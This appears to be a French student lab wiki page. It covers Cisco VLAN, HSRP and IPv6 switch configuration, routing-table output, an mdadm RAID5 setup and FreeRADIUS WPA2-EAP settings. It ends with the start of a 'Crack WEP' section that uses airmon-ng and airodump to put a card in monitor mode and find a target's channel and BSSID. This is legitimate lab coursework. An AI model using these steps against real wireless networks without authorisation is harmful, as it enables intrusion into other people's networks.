 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
